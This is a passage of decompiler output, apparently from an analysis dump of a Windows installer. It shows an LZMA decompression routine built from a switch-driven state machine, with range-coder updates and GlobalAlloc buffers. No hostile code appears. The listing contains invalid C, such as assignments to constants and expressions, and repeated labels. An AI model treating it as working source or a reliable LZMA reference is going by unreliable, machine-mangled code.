									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
